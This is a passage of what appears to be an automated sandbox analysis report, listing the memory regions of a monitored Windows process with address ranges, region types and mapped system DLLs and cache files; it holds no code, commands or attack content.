	          end_va = 0x2ad6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029f0000"
	        filename = ""

Region:
	              id = 367
	        start_va = 0x2900000
	          end_va = 0x2c95fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 368
	        start_va = 0x2ca0000
	          end_va = 0x3038fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002ca0000"
	        filename = ""

Region:
	              id = 369
	        start_va = 0x24e0000
	          end_va = 0x2577fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024e0000"
	        filename = ""

Region:
	              id = 370
	        start_va = 0x2900000
	          end_va = 0x299ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 371
	        start_va = 0x24e0000
	          end_va = 0x2582fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024e0000"
	        filename = ""

Region:
	              id = 372
	        start_va = 0x2900000
	          end_va = 0x29a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 373
	        start_va = 0xcc0000
	          end_va = 0xcfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000cc0000"
	        filename = ""

Region:
	              id = 374
	        start_va = 0xd00000
	          end_va = 0xdfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000d00000"
	        filename = ""

Region:
	              id = 375
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 376
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 377
	        start_va = 0x76c00000
	          end_va = 0x76ceafff
	       monitored = 0
	     entry_point = 0x76c3d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 378
	        start_va = 0xe50000
	          end_va = 0xe8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e50000"
	        filename = ""

Region:
	              id = 379
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 380
	        start_va = 0x73c40000
	          end_va = 0x73cb4fff
	       monitored = 0
	     entry_point = 0x73c79a60
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")

Region:
	              id = 381
	        start_va = 0x2a00000
	          end_va = 0x2b6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a00000"
	        filename = ""

Region:
	              id = 382
	        start_va = 0x6e630000
	          end_va = 0x6e77afff
	       monitored = 0
	     entry_point = 0x6e691660
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")

Region:
	              id = 383
	        start_va = 0x24e0000
	          end_va = 0x24e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024e0000"
	        filename = ""

Region:
	              id = 384
	        start_va = 0xe90000
	          end_va = 0xecffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e90000"
	        filename = ""

Region:
	              id = 385
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 386
	        start_va = 0x2a00000
	          end_va = 0x2afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a00000"
	        filename = ""

Region:
	              id = 387
	        start_va = 0x2b60000
	          end_va = 0x2b6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002b60000"
	        filename = ""

Region:
	              id = 388
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 389
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 390
	        start_va = 0x2500000
	          end_va = 0x2500fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002500000"
	        filename = ""

Region:
	              id = 391
	        start_va = 0x2510000
	          end_va = 0x2513fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 392
	        start_va = 0x2520000
	          end_va = 0x2564fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")

Region:
	              id = 393
	        start_va = 0x2570000
	          end_va = 0x2573fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 394
	        start_va = 0x2b70000
	          end_va = 0x2bfdfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 395
	        start_va = 0x2580000
	          end_va = 0x2590fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "propsys.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui")

Region:
	              id = 396
	        start_va = 0x25a0000
	          end_va = 0x25a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cversions.1.db"
	        filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")

Region:
	              id = 397
	        start_va = 0x2b00000
	          end_va = 0x2b13fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db"
	        filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db")

Region:
	              id = 398
	        start_va = 0x2b20000
	          end_va = 0x2b20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002b20000"
	        filename = ""

Region:
	              id = 417
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 418
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 450
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 451
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 511
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 512
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 513
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 523
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 582
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 583
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 584
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 585
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 638
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 639
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 670
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 671
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 728
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 729
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 751
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 752
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 779
	        start_va = 0x25a0000
	          end_va = 0x25a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 825
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 826
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 868
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 869
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 1011
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 1012
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 1052
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 1053
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 1176
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1177
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 1295
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 1296
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 1473
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 1474
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 1635
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 1636
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 2024
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2025
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 2152
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 2153
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 2376
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 2377
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 2423
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 2424
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 3021
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3022
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 3069
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 3070
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 3253
	        start_va = 0xed0000
	          end_va = 0xf0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ed0000"
	        filename = ""

Region:
	              id = 3254
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 3292
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 3293
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 3490
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3491
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 3566
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 3567
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 3675
	        start_va = 0xe50000
	          end_va = 0xe8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e50000"
	        filename = ""

Region:
	              id = 3676
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 3717
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 3718
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 3866
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3867
	        start_va = 0x5a0000
	          end_va = 0x69ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 3905
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 3906
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 4065
	        start_va = 0xe50000
	          end_va = 0xe8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e50000"
	        filename = ""

Region:
	              id = 4066
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 4121
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 4122
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 4129
	        start_va = 0x1c0000
	          end_va = 0x1c6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4285
	        start_va = 0x5a0000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 4286
	        start_va = 0x2c00000
	          end_va = 0x2cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c00000"
	        filename = ""

Region:
	              id = 4338
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 4339
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 4485
	        start_va = 0x5e0000
	          end_va = 0x61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 4486
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 4622
	        start_va = 0xe50000
	          end_va = 0xf4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000e50000"
	        filename = ""

Region:
	              id = 4623
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 4624
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 4781
	        start_va = 0x620000
	          end_va = 0x65ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000620000"
	        filename = ""

Region:
	              id = 4782
	        start_va = 0x2a00000
	          end_va = 0x2afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a00000"
	        filename = ""

Region:
	              id = 4877
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 4878
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 5039
	        start_va = 0x5e0000
	          end_va = 0x61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 5040
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 5085
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 5086
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 5254
	        start_va = 0x620000
	          end_va = 0x65ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000620000"
	        filename = ""

Region:
	              id = 5255
	        start_va = 0x2a00000
	          end_va = 0x2afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a00000"
	        filename = ""

Region:
	              id = 5290
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 5291
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")

Region:
	              id = 5456
	        start_va = 0x5e0000
	          end_va = 0x61ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005e0000"
	        filename = ""

Region:
	              id = 5457
	        start_va = 0x2900000
	          end_va = 0x29fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002900000"
	        filename = ""

Region:
	              id = 5490
	        start_va = 0x24f0000
	          end_va = 0x24f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000024f0000"
	        filename = ""

Region:
	              id = 5491
	        start_va = 0x6fc60000
	          end_va = 0x6fe7bfff
	       monitored = 0
	     entry_point = 0x6fe2bc40
	     region_type = mapped_file
	            name = "actxprxy.dll"
